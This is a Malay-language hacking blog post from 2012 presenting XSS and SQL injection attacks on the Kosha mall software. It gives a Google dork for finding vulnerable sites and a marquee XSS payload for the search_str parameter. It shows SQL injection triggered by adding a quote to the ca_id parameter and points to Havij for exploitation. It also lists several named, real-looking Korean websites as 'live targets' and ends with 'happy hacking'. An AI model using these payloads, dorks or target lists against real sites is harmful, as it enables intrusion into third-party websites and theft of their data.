Thursday, 6 December 2012

Kosha - XSS and SQLi Vulnerability

Assalamualaikum....hari ini aku nak share satu exploit.Exploit ni adalah Kosha.Exploit ini adalah multiple vulnerability sebab korang boleh melakukan serangan XSS dan SQLi.
Website yang terdedah kepada vulnerability ini kebanyakan adalah website korea.


Ok jom mula~

XSS

1. Mula-mula search google dork :
inurl:"/mall/list.php?ca_id="

Ok dalam tutorial ni aku akan guna website ini :
2. Vuln nya terdapat di search.php?search_str=XSS
Ataupun korang cuma perlu masukkan code html kedalam kotak search.

Contoh : 
http://gallery-hw.co.kr/mall/search.php?search_str=<marquee>XSS</marquee>



Demo : XSS

Live Target : 
http://okkorea119.com/mall/search.php?search_str=XSS
http://plusmind.co.kr/mall/search.php?search_str=XSS
http://hktape.co.kr/mall/search.php?search_str=XSS
http://rmbdiary.com/mall/search.php?search_str=XSS
http://jinsungdiary.com/mall/search.php?search_str=XSS
http://gallery-hw.co.kr/mall/search.php?search_str=XSS


SQLi

1. Guna dork seperti diatas.

Dalam tutorial ni aku akan guna website yang sama untuk menunjukkan bukti multiple vuln.

2. Url website yang korang dapat akan macam web ni :
http://gallery-hw.co.kr/mall/list.php?ca_id=3

Tambah ' di hujung url dan error sqli akan keluar :



Sekarang korang cuma perlu inject guna havij,manual atau benda lain. :)

Live Target :
http://www.okkorea119.com/mall/list.php?ca_id=1'
http://www.dunam.co.kr/mall/list.php?ca_id=10'
http://gallery-hw.co.kr/mall/list.php?ca_id=3'


Itu saja happy hacking.
Assalamualaikum

Item Reviewed: Kosha - XSS and SQLi Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com